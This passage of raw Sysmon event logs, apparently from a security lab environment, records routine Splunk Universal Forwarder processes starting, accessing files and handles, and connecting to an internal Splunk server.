Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152040Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:05.259{39BD8DE3-480E-60CA-FA07-00000000D101}71324084C:\Windows\system32\conhost.exe{39BD8DE3-7195-60CA-2D0D-00000000D101}6512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152039Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:05.259{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152038Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:05.259{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152037Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:05.259{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152036Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:05.259{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152035Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:05.259{39BD8DE3-0F63-60CA-0500-00000000D101}408976C:\Windows\system32\csrss.exe{39BD8DE3-7195-60CA-2D0D-00000000D101}6512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000152034Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:05.259{39BD8DE3-480D-60CA-F607-00000000D101}51125172C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{39BD8DE3-7195-60CA-2D0D-00000000D101}6512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000152033Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:05.260{39BD8DE3-7195-60CA-2D0D-00000000D101}6512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{39BD8DE3-0F64-60CA-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000105275Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:06.510{54715871-FD18-60C9-1000-00000000CF01}380NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=AF244DEB216A9AA3B3F77E6F602642ED,SHA256=F830083AA1918970E00089E3DC4024E03AF2E6930253E6DE5DCC2E9F9F76A744,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000105274Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:03.754{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55448-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000105273Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:06.021{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EB241E0D340A6E3C9DEA0A864E0A998,SHA256=DF5BA2CAD90558DA2C80D77EFE484E4931FDD60B83523DD407ECE6BA913646DE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000152052Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:05.063{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58429-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 10341000x8000000000000000152051Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:06.130{39BD8DE3-480E-60CA-FA07-00000000D101}71324084C:\Windows\system32\conhost.exe{39BD8DE3-7196-60CA-2E0D-00000000D101}6428C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152050Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:06.130{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152049Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:06.130{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152048Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:06.130{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152047Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:06.130{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152046Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:06.130{39BD8DE3-0F63-60CA-0500-00000000D101}408424C:\Windows\system32\csrss.exe{39BD8DE3-7196-60CA-2E0D-00000000D101}6428C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000152045Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:06.130{39BD8DE3-480D-60CA-F607-00000000D101}51125172C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{39BD8DE3-7196-60CA-2E0D-00000000D101}6428C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000152044Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:06.131{39BD8DE3-7196-60CA-2E0D-00000000D101}6428C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{39BD8DE3-0F64-60CA-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000152043Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:05.999{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16A7F1034020149131FB4D392AED2999,SHA256=7118B19CB9C1C27B5B55BEE67C82CAE4603D976EB89B326155521DAA9C3838D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105276Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:07.435{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E6A12AB200ADA84ADAADB53C207FF1B,SHA256=928678E0D0B9B56F81A013A54BC158EC0ECCEC36C8EA3799CB33D7AB5C30B886,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000152063Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:07.882{39BD8DE3-480E-60CA-FA07-00000000D101}71324084C:\Windows\system32\conhost.exe{39BD8DE3-7197-60CA-2F0D-00000000D101}7020C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152062Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:07.882{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152061Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:07.882{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152060Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:07.882{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152059Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:07.882{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152058Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:07.882{39BD8DE3-0F63-60CA-0500-00000000D101}408424C:\Windows\system32\csrss.exe{39BD8DE3-7197-60CA-2F0D-00000000D101}7020C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000152057Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:07.882{39BD8DE3-480D-60CA-F607-00000000D101}51125172C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{39BD8DE3-7197-60CA-2F0D-00000000D101}7020C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000152056Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:07.883{39BD8DE3-7197-60CA-2F0D-00000000D101}7020C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{39BD8DE3-0F64-60CA-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000152055Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:07.666{39BD8DE3-480D-60CA-F607-00000000D101}5112NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=87657D68C727D4F417C5346ABF35F152,SHA256=9C850A5D797C891B275B40E6DB9307C8C7979F29879EB6EAEEA9A86ED4C088D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152054Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:07.298{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 